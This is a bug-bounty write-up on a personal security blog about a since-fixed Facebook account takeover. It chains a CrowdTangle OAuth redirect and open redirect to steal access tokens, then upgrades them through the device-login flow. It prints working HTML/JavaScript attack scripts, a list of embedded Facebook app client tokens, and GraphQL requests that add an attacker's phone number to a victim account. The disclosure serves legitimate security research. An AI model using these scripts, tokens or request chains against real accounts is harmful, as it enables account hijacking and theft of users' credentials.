<!DOCTYPE html>









<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en"
  
>

  <!--
  The Head
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  

    

    

  

  

  

  
    <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="Facebook account takeover due to unsafe redirects after the OAuth flow" />
<meta name="author" content="qw" />
<meta property="og:locale" content="en" />
<meta name="description" content="Description" />
<meta property="og:description" content="Description" />
<link rel="canonical" href="http://localhost:4000/posts/facebook-account-takeover-due-to-unsafe-redirects-after-the-oauth-flow/" />
<meta property="og:url" content="http://localhost:4000/posts/facebook-account-takeover-due-to-unsafe-redirects-after-the-oauth-flow/" />
<meta property="og:site_name" content="Youssef Sammouda" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-04-30T03:11:00+02:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Facebook account takeover due to unsafe redirects after the OAuth flow" />
<meta name="twitter:site" content="@samm0uda" />
<meta name="twitter:creator" content="@qw" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"qw"},"dateModified":"2021-04-30T03:11:00+02:00","datePublished":"2021-04-30T03:11:00+02:00","description":"Description","headline":"Facebook account takeover due to unsafe redirects after the OAuth flow","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/facebook-account-takeover-due-to-unsafe-redirects-after-the-oauth-flow/"},"url":"http://localhost:4000/posts/facebook-account-takeover-due-to-unsafe-redirects-after-the-oauth-flow/"}</script>
<!-- End Jekyll SEO tag -->

  

  <title>Facebook account takeover due to unsafe redirects after the OAuth flow | Youssef Sammouda
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="Youssef Sammouda">
<meta name="application-name" content="Youssef Sammouda">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  

    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin>
    
      <link rel="preconnect" href="https://fonts.googleapis.com" >
      <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
    
      <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
    

    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  

  <!-- GA -->
  

  <!-- Bootstrap -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.2.1/css/all.min.css">

  <link rel="stylesheet" href="/assets/css/style.css">

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css">
  

  
    <!-- Manific Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css">
  

  <!-- JavaScript -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.1/dist/jquery.min.js"></script>

  
    <!--
  Switch the mode between dark and light.
-->

<script type="text/javascript">
  class ModeToggle {
    static get MODE_KEY() { return "mode"; }
    static get MODE_ATTR() { return "data-mode"; }
    static get DARK_MODE() { return "dark"; }
    static get LIGHT_MODE() { return "light"; }
    static get ID() { return "mode-toggle"; }

    constructor() {
      if (this.hasMode) {
        if (this.isDarkMode) {
          if (!this.isSysDarkPrefer) {
            this.setDark();
          }
        } else {
          if (this.isSysDarkPrefer) {
            this.setLight();
          }
        }
      }

      let self = this;

      /* always follow the system prefers */
      this.sysDarkPrefers.addEventListener("change", () => {
        if (self.hasMode) {
          if (self.isDarkMode) {
            if (!self.isSysDarkPrefer) {
              self.setDark();
            }

          } else {
            if (self.isSysDarkPrefer) {
              self.setLight();
            }
          }

          self.clearMode();
        }

        self.notify();

      });

    } /* constructor() */

    get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); }

    get isSysDarkPrefer() { return this.sysDarkPrefers.matches; }

    get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; }

    get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; }

    get hasMode() { return this.mode != null; }

    get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); }

    /* get the current mode on screen */
    get modeStatus() {
      if (this.isDarkMode
        || (!this.hasMode && this.isSysDarkPrefer)) {
        return ModeToggle.DARK_MODE;
      } else {
        return ModeToggle.LIGHT_MODE;
      }
    }

    setDark() {
      $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE);
    }

    setLight() {
      $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE);
    }

    clearMode() {
      $('html').removeAttr(ModeToggle.MODE_ATTR);
      sessionStorage.removeItem(ModeToggle.MODE_KEY);
    }

    /* Notify another plugins that the theme mode has changed */
    notify() {
      window.postMessage({
        direction: ModeToggle.ID,
        message: this.modeStatus
      }, "*");
    }

  } /* ModeToggle */

  const toggle = new ModeToggle();

  function flipMode() {
    if (toggle.hasMode) {
      if (toggle.isSysDarkPrefer) {
        if (toggle.isLightMode) {
          toggle.clearMode();
        } else {
          toggle.setLight();
        }

      } else {
        if (toggle.isDarkMode) {
          toggle.clearMode();
        } else {
          toggle.setDark();
        }
      }

    } else {
      if (toggle.isSysDarkPrefer) {
        toggle.setLight();
      } else {
        toggle.setDark();
      }
    }

    toggle.notify();

  } /* flipMode() */

</script>

  
</head>


  <body data-spy="scroll" data-target="#toc" data-topbar-visible="true">

    <!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end">
  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/" class="mx-auto">
        
          
          <img src="/assets/img/4Y7B9422-4.jpeg" alt="avatar" onerror="this.style.display='none'">
        
      </a>
    </div>

    <div class="site-title">
      <a href="/">Youssef Sammouda</a>
    </div>
    <div class="site-subtitle font-italic"><div>Welcome to my blog!</div></div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100" style="padding-top: 20px;">

    <!-- home -->
    <li class="nav-item">
      <a href="/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs -->
    
    <li class="nav-item">
      <a href="/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>BLOG ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/videos/" class="nav-link">
        <i class="fa-fw fas fa-video ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>VIDEOS</span>
      </a>
    </li> <!-- .nav-item -->
    

  </ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center">

    
      <button class="mode-toggle btn" aria-label="Switch Mode">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    
      

      
      <a href="https://www.linkedin.com/in/ysammouda/" aria-label="linkedin"
        
        
          
          target="_blank"
        

        

        rel="noopener">
        <i class="fab fa-linkedin"></i>
      </a>
      

    
      

      
      <a href="https://github.com/samm0uda" aria-label="github"
        
        
          
          target="_blank"
        

        

        rel="noopener">
        <i class="fab fa-github"></i>
      </a>
      

    
      

      
      <a href="https://twitter.com/samm0uda" aria-label="twitter"
        
        
          
          target="_blank"
        

        

        rel="noopener">
        <i class="fab fa-twitter"></i>
      </a>
      

    
      

      
      <a href="/feed.xml" aria-label="rss"
        
        

        

        >
        <i class="fas fa-rss"></i>
      </a>
      

    

  </div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->


    
    

    <!--
  The Top Bar
-->


  <div id="topbar-wrapper">
    <div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4">
      <span id="breadcrumb">
        <span>ysamm.com</span></i>
      </span><!-- endof #breadcrumb -->

      <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

      <div id="topbar-title">
        Post
      </div>

      <i id="search-trigger" class="fas fa-search fa-fw"></i>
      <span id="search-wrapper" class="align-items-center">
        <i class="fas fa-search fa-fw"></i>
        <input class="form-control" id="search-input" type="search"
          aria-label="search" autocomplete="off" placeholder="Search...">
      </span>
      <span id="search-cancel" >Cancel</span>
    </div>

  </div>




    
    <div id="main-wrapper" class="d-flex justify-content-center">
      <div id="main" class="container pl-xl-4 pr-xl-4">
        





<div class="row">

  
  <!-- core -->
  <div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4">
    <div class="post pl-1 pr-1 pl-md-2 pr-md-2">

    

    
      
      
        <!--
  Refactor the HTML structure.
-->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->


<!-- images -->





<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  

  
  

  

  
  

  

  
  

  




<!-- Wrap prompt element of blockquote with the <div> tag -->







<!-- return -->

<h1 data-toc-skip>Facebook account takeover due to unsafe redirects after the OAuth flow</h1>

<div class="post-meta text-muted">
    <!-- published date -->
    <span>
      Posted
      <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class=""
    data-ts="1619745060"
    data-df="ll"
    data-toggle="tooltip" data-placement="bottom">
  Apr 30, 2021
</em>

    </span>

    <!-- lastmod date -->
    

  

  <div class="d-flex justify-content-between">
    <!-- author(s) -->
    <span>
      

      By

      <em>
      
        
          <a href=""></a>
          
        
      
      </em>
    </span>

    <div>
      <!-- page views -->
      

      <!-- read time -->
      <!--
  Calculate the post's reading time, and display the word count in tooltip
 -->



<!-- words per minute  -->










<!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom"
  title="1706 words">
  <em>9 min</em> read</span>

    </div>

  </div> <!-- .d-flex -->

</div> <!-- .post-meta -->

<div class="post-content">
  <p><strong>Description</strong></p>

<p>This bug could allow a malicious user to takeover the Facebook account after stealing a first-party access_token issued to <strong>apps.crowdtangle.com</strong>. The OAuth callback endpoint of <strong>apps.crowdtangle.com</strong> Facebook application would redirect the access_token to another endpoint in case the user is already logged-in. The other endpoint could be set by the attacker which means if we can find an open redirect in apps.crowdtangle.com, it could redirect the token in the fragment part of the URL to another website and use it to takeover the account. This attack won’t require user interaction.</p>

<p><strong>Details</strong></p>

<ul>
  <li><strong>Stealing the Facebook limited access_token of a user</strong></li>
</ul>

<ol>
  <li>If a not logged-in user visits any page in <strong>apps.crowdtangle.com</strong> that requires a logged-in user, a cookie would be set to the visited page ( cookie <strong>redirect_url</strong>=https%3A%2F%2Fapps.crowdtangle.com%2F<strong>ENDPOINT</strong>) . Then a redirection will be made to <strong>https://apps.crowdtangle.com/auth?type=0</strong> . After the user log-in, any request to <strong>https://apps.crowdtangle.com/facebook/auth</strong> endpoint would result to a 302 redirect to the URL inside the cookie <strong>redirect_url</strong>. Here the selected endpoint in the redirect_url cookie should be replaced with the open redirect endpoint.</li>
  <li>The Facebook application for <strong>apps.crowdtangle.com</strong> has the id 527443567316408, its correct callback endpoint is <strong>https://apps.crowdtangle.com/facebook/auth</strong>. To authenticate a user can visit <strong>https://apps.crowdtangle.com/auth/server</strong> endpoint, he/she would be redirected to <strong>https://apps.crowdtangle.com/facebook/auth</strong> , then redirected to https://www.facebook.com/v2.9/dialog/oauth?client_id=527443567316408&amp;redirect_uri=https://apps.crowdtangle.com/facebook/auth&amp;response_type=code&amp;state=VALID_STATE . A valid callback would result in a POST message sent to <strong>apps.crowdtangle.com/users/login</strong> and the user would be logged-in. <br />
 From now on, any request to <strong>apps.crowdtangle.com/facebook/auth</strong> would redirect to <strong>https://apps.crowdtangle.com/ENDPOINT</strong>.</li>
  <li>Since the callback endpoint would redirect to any url specified in step 1 by the attacker ( in our case <strong>https://apps.crowdtangle.com/ENDPOINT</strong>) , we would re-request <strong>https://www.facebook.com/v2.9/dialog/oauth?client_id=527443567316408&amp;redirect_uri=https://apps.crowdtangle.com/facebook/auth&amp;response_type=token</strong> , this time a token was requested and this would be returned in the fragment part of the url and not a code attached as a parameter (/facebook/auth#access_token=). Since now the user is logged-in after step 2, the endpoint /facebook/auth would redirect to /ENDPOINT, the browser would pass the hash part to the next url. The endpoint <strong>apps.crowdtangle.com/ENDPOINT</strong> would redirect to the attacker website with the URL fragment part containing the token.</li>
  <li>The <strong>apps.crowdtangle.com/ENDPOINT</strong> would be replaced in the attack with the open redirect endpoint. This would be <strong>apps.crowdtangle.com/CUSTOM_PAGE/e/x/x/HASH/</strong> . <strong>CUSTOM_PAGE</strong> would be attacker or public board and we would manipulate the <strong>HASH</strong> part which is an encoded string that represent the next URL.</li>
</ol>

<p>All previous steps would result to the ability to steal a Facebook user access_token generated under the Crowdtangle Facebook application permissions. Below is the attack script applying all previous steps in order and would lead to the access_token being received in the attacker website.</p>

<pre><code class="language-markup">&lt;html&gt;
&lt;body&gt;
&lt;script&gt;
cli = function(){
opn = window.open("&lt;strong&gt;https://apps.crowdtangle.com/CUSTOM_PAGE/e/x/x/HASH/&lt;/strong&gt;");
setTimeout(function(){

opn.location.href = "https://apps.crowdtangle.com/auth/server";
setTimeout(function(){opn.location.href = "https://www.facebook.com/v2.9/dialog/oauth?client_id=527443567316408&amp;redirect_uri=https://apps.crowdtangle.com/facebook/auth&amp;state=ANY_STATE&amp;response_type=token";},3000);
},4000);
}
&lt;/script&gt;
&lt;button onclick='cli()'&gt;Click&lt;/button&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>

<p>The Facebook user access_token received is first-party ( generated by a Facebook owned application ) which could be used to access <strong>https://graph.facebook.com/graphql</strong> endpoint. However, access_tokens generated for this particular application ( Crowdtangle ) had some limitations while doing graphql queries/mutations. The access_token would not allow us to do mutations which would turn it useless if we want to takeover the account since we won’t be able to add a new phone number or email. Also queries were limited and i wasn’t able to collect serious information about the user.</p>

<ul>
  <li><strong>Upgrading the access_token to another first-party application and then Account takeover</strong></li>
</ul>

<p>Facebook allows <a href="https://developers.facebook.com/docs/facebook-login/for-devices/">device logins</a>. This is a feature for applications created in devices like TVs to enable to login to Facebook without email and password but instead a temporary code. The authentication mechanism would work as follow: <br />
First the application requesting device login would request a temporary code from Facebook, this would return a code to be shown to the Facebook user and another code ( we’ll note it retrieve_code ) to get the access_token of the user in case he/she accepted to use the application. Then, it should display the code to the user who would need to enter it in <strong>www.facebook.com/device</strong> or inside his/her mobile device. After entering the code, the user would be promoted to accept or deny to use the application. If he/she accepted to use it, this would result to the application requesting another API endpoint with the retrieve_code and which would result to the user access_token being returned.</p>

<p>Since many Facebook applications also use this login method in devices like TVs and Watches, we can reverse engineer the applications, get their client_code they use to request the temporary code to be shown to the user. After being shown to the user, we can get the access_token which would be a first party access_token.</p>

<p>Now how this would be linked to the previous attack? Since the previous method would require an excessive user interaction ( entering the user code , accepting to use the application , CSRF protections … ) before we can get the user access_token , it’s normally categorized to be safe by Facebook and can’t be leveraged by attackers ( unless a CSRF bypass is found for example like my good friend <a href="https://www.josipfranjkovic.com/blog/hacking-facebook-csrf-device-login-flow">JOSIP</a> did before ). <br />
What we can do here is to use the previous limited access_token gathered to make some Graphql Queries that would return us the CSRF token used in the Authentication flow. Since the CSRF token is not linked to the user browsing session, we can inject it in a malicious URL that would request Facebook OAuth endpoint and would lead directly to us getting a new access_token with much higher permissions.</p>

<p>From the previous attack , the victim would be redirected with an access_token to the attacker website. The attacker website would receive the access_token and do the following steps:</p>

<ol>
  <li>
    <div class="table-wrapper"><table>
      <tbody>
        <tr>
          <td>Send a POST request to <strong>https://graph.facebook.com/v2.6/device/login</strong> with these parameters “**scope=public_profile&amp;access_token=437340816620806</td>
          <td>04a36c2558cde98e185d7f4f701e4d94**” ( Notice the access_token of the victim wasn’t used but here we’re creating a device code to authorize the application 437340816620806 which is a first party application that allows device logins).</td>
        </tr>
      </tbody>
    </table></div>

    <p>We’ll note the “user_code”, as <strong>USER_CODE</strong> and the “code” to retrieve the victim access_token later as “<strong>RETRIEVE_CODE</strong>“</p>
  </li>
  <li>
    <p>Request https://graph.facebook.com/graphql?access_token=<strong>VICTIM_CROWDTANGLE_TOKEN</strong>&amp;variables={“userCode”:”<strong>USER_CODE</strong>“}&amp;doc_id=2024649757631908&amp;method=POST (USER_CODE from previous step)<br />
 <strong>VICTIM_CROWDTANGLE_TOKEN</strong> is the access_token stolen from Crowdtangle.</p>

    <p>This should authorize the USER_CODE and also return a CSRF “nonce” , we’ll note it <strong>USER_NONCE</strong></p>
  </li>
  <li>
    <p>Redirect the user to https://m.facebook.com/dialog/oauth/?app_id=437340816620806&amp;redirect_uri=https://m.facebook.com/device/logged_in/?user_code%3D<strong>USER_CODE</strong>%26nonce%3D<strong>USER_NONCE</strong>%26is_preset_code%3D0&amp;ref=DeviceAuth&amp;nonce=<strong>USER_NONCE</strong>&amp;user_code=<strong>USER_CODE</strong>&amp;auth_type=rerequest&amp;scope=public_profile&amp;qr=0&amp;_rdr after replacing all occurrences of USER_CODE and USER_NONCE. Here we removed the force_confirmation parameter to avoid user interaction. ( To better understand where this came from, try to do step 1 and enter the user_code in m.facebook.com/device ).</p>

    <p>Since from previous steps, we already generated a valid CSRF token/nonce that matches with the supplied USER_CODE, this would work perfectly without user interaction.</p>
  </li>
  <li>This should redirect to <strong>https://m.facebook.com/device/logged_in/</strong> with an oauth code, a valid user nonce and valid user code. The authorization of the application should be successful.</li>
  <li>In the attacker side, he/she would make this request to retrieve the first party access_token which doesn’t have limitations:</li>
</ol>

<p><strong>https://graph.facebook.com/v2.6/device/login_status?access_token=437340816620806|04a36c2558cde98e185d7f4f701e4d94&amp;code=RETRIEVE_CODE&amp;method=post</strong> after replacing RETRIEVE_CODE. This should return a first party access_token authorized by 437340816620806 application . We’ll note it <strong>FIRST_PARTY</strong>. <br />
The attacker would use this token to takeover the account by adding a phone number:</p>

<p><strong>Adding:</strong> https://graph.facebook.com/graphql?access_token=FIRST_PARTY&amp;doc_id=10153582085883380&amp;variables{“input”:{“client_mutation_id”:1,”actor_id”:”VICTIM_USER_ID”,”phone_number”:”ATTACKER_PHONE”}}&amp;method=POST</p>

<p><strong>Verification:</strong> https://graph.facebook.com/graphql?access_token=FIRST_PARTY&amp;doc_id=10153582085808380&amp;variables{“input”:{“client_mutation_id”:1,”actor_id”:”VICTIM_USER_ID”,”confirmation_code”:”RECEIVED_CONFIRMATION_CODE”}}&amp;method=POST</p>

<p>This second-stage script would try to get an access_token generated from one of the Facebook applications that uses Facebook device login. Many were tried below and not one since if the user didn’t use one application before , he/she would be asked to authenticate it first. We try all of them to increase the chance that one of them was previously authenticated and thus user interaction won’t be required:</p>

<pre><code class="language-markup">&lt;html&gt;
 &lt;body&gt;
 &lt;script&gt;
 keys = ["1348564698517390|007c0a9101b9e1c8ffab727666805038",
 "972631359479220|4122f9182c57154d89cab3cbb62259db",
 "155327495133707|a151725bc9b8808a800f4c891505e558",
 "1331685116912965|e334a1eca4d4ea9ac0c0132a31730663",
 "867777633323150|446fdcd4a3704f64e5f6e5fd12d35d01",
 "437340816620806|04a36c2558cde98e185d7f4f701e4d94",
 "661587963994814|ffe07cc864fd1dc8fe386229dcb7a05e",
 "1692575501067666|3168904bd42ebb12bf981327de99179f",
 "522404077880990|f4b8e52fea9ccae9793e11b66cca3ae0",
 "233936543368280|b5790a8768f5fd987220d34341a8f1d8",
 "1174099472704185|0722a7d5b5a4ac06b11450f7114eb2e9",
 "628551730674460|b9693d3e013cfb23ec2c772783d14ce8",
 "1664853620493280|786621f3867f7ab1bfc0ff9d616803fc",
 "521501484690599|3153679748f276e17ffe16c3f3a06b14"];
 token = "";
 if (&lt;span style="background-color: transparent; color: rgb(57, 58, 52); font-size: 1em;"&gt;window.location.hash&lt;/span&gt;) {
 crowd_token = window.location.hash.split("=")[1];
 start_attack(null, keys.shift());
 }
 async function second_stage(wind, user_code, retrieve, key){
     fetch("https://graph.facebook.com/graphql?access_token=" +crowd_token.toString() + '&amp;variables={"userCode":"' + user_code + '"}&amp;server_timestamps=true&amp;doc_id=2024649757631908',{method:"POST", mode:"cors" ,credentials:"omit"}).then(response =&gt; response.json()).then(function(data){
         if(data.data.device_request.device_record.nonce){
         nonce = data.data.device_request.device_record.nonce;} else {nonce = "ignore"};
         app_id = key.split("|")[0];
         wind.location.href = `https://m.facebook.com/dialog/oauth/?app_id=${app_id}&amp;redirect_uri=https%3A%2F%2Fm.facebook.com%2Fdevice%2Flogged_in%2F%3Fuser_code%3D${user_code}%26nonce%3D${nonce}%26is_preset_code%3D0&amp;ref=DeviceAuth&amp;nonce=${nonce}&amp;user_code=${user_code}&amp;auth_type=rerequest&amp;scope=public_profile&amp;qr=0&amp;_rdr`;
 `}); setTimeout(function(){     fetch("https://graph.facebook.com/v2.6/device/login_status?access_token=" + key + "&amp;code=" + retrieve + "&amp;locale=en_US&amp;method=post",{method:"POST", mode:"cors" ,credentials:"omit"}).then(response =&gt; response.json()).then(function(data){if(data.access_token){alert(data.access_token);} else if(!keys.length == 0){start_attack(wind, keys.shift())} })  },7000)`
 }
 function start_attack(wind, key){
     if (!wind){
     wind = window.open("about:blank");}
     fetch("https://graph.facebook.com/v2.6/device/login?access_token=" + key ,{method:"POST", mode:"cors" ,credentials:"omit"}).then(response =&gt; response.json()).then(function(data){
     USER_CODE = data.user_code;
     RETRIEVE_CODE = data.code;
     if ( USER_CODE &amp;&amp; RETRIEVE_CODE){
         second_stage(wind, USER_CODE, RETRIEVE_CODE, key);} 
     else {
         start_attack(wind, keys.shift())
     }
     });
 }
 &lt;/script&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</code></pre>

<p>Here we’re just doing an alert of the new retrieved token but in a real life scenario we would save the token and then use it later to takeover the account like explained before.</p>

<p><strong>Fix</strong></p>

<p>Many fixes were done by the Facebook team: <br />
– When the Crowdtangle user is logged-in and the redirect_url was previously set, it would try to remove the cookie and also if it wasn’t, visiting <strong>https://apps.crowdtangle.com/facebook/auth</strong> now would result to being redirected to the URL inside redirect_url cookie but after appending the character <strong>#</strong>. This would stop previous fragment to be passed to the next URL.<br />
– The open redirect in <strong>https://apps.crowdtangle.com/CUSTOM_PAGE/e/x/x/HASH/</strong> was fixed.<br />
– The CrowdTangle access_token can’t be used now to access graph.facebook.com/graphql endpoint ( app secret proof is now required ) and which would stop an attacker from requesting a device login nonce and upgrade to another access token.</p>

<p><strong>Timeline</strong></p>

<p>Feb 12, 2021— Report Sent <br />
Feb 23, 2021— Acknowledged by Facebook<br />
Feb 25, 2021— Fixed by Facebook<br />
Mar 9, 2021 — $1.2K bounty awarded by Facebook. Apparently the Facebook team missed the possibility to takeover the Facebook account from the access_token stolen from Crowdtangle and though this only affected Crowdtangle users. I argued about the bounty amount.<br />
Mar 12, 2021 – More details were sent explaining further approaches that could be used by the attacker to upgrade the access_token and takeover the account.<br />
Mar 15, 2021— Acknowledged by Facebook<br />
Apr 3, 2021— Fixed by Facebook<br />
Apr 30, 2021 — $28.8K (including bonus) bounty awarded by Facebook.</p>

<p>PS: One weird thing you can notice here is the time from the Fixed state to Resolved and payment. It took Facebook 27 days to pay me the reward after the fix which become usual in the past year. Many complains were sent by me and other researchers who suffers from the same problem but nothing changed. Hope they can fix this soon and we can get the same rate for first response and time to bounty as the previous years.</p>

<p>&lt;/body&gt;&lt;/html&gt;</p>

</div>

<div class="post-tail-wrapper text-muted">

  <!-- categories 
  
  <div class="post-meta mb-3">
    <i class="far fa-folder-open fa-fw mr-1"></i>
    
      <a href='/categories/uncategorized/'>Uncategorized</a>
  </div>
  
  -->
  <!-- tags 
  
  -->
  <div class="post-tail-bottom
    d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
    <div class="license-wrapper">

      

        

        This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.

      
    </div>

    <!--
 Post sharing snippet
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons">
    
    
    

    
      
        <a href="https://twitter.com/intent/tweet?text=Facebook%20account%20takeover%20due%20to%20unsafe%20redirects%20after%20the%20OAuth%20flow%20-%20Youssef%20Sammouda&url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Ffacebook-account-takeover-due-to-unsafe-redirects-after-the-oauth-flow%2F" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a>
    
      
        <a href="https://www.linkedin.com/sharing/share-offsite/?url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Ffacebook-account-takeover-due-to-unsafe-redirects-after-the-oauth-flow%2F" data-toggle="tooltip" data-placement="top"
          title="Linkedin" target="_blank" rel="noopener" aria-label="Linkedin">
          <i class="fa-fw fab fa-linkedin"></i>
        </a>
    
      
        <a href="https://www.facebook.com/sharer/sharer.php?title=Facebook%20account%20takeover%20due%20to%20unsafe%20redirects%20after%20the%20OAuth%20flow%20-%20Youssef%20Sammouda&u=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Ffacebook-account-takeover-due-to-unsafe-redirects-after-the-oauth-flow%2F" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a>
    

    <i id="copy-link" class="fa-fw fas fa-link small"
        data-toggle="tooltip" data-placement="top"
        title="Copy link"
        data-title-succeed="Link copied successfully!">
    </i>

  </span>
</div>


  </div><!-- .post-tail-bottom -->

</div><!-- div.post-tail-wrapper -->


      
    
    

    </div>
  </div> <!-- #core-wrapper -->

  <!-- panel -->
  
  <div id="panel-wrapper" class="col-xl-3 pl-2 text-muted">
  
    
      <div class="access">
        















        <!--

















-->
      </div>

      
        
        




      
    

    

</div>
  

</div>


<!-- tail -->

<div class="row">
  <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4 mt-5">
    
      
      <!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.
-->

<!-- The total size of related posts  -->


<!-- An random integer that bigger than 0  -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy}  -->








  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  
    
  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  








<!-- Fill with the other newlest posts  -->





  <div id="related-posts" class="mb-2 mb-sm-4">
    <h3 class="pt-2 mb-4 ml-1"
      data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4">
    
      
      
      <div class="card">
        <a href="/posts/disclose-unconfirmed-email-phone-of-a-facebook-user/">
          <div class="card-body">
            <!--
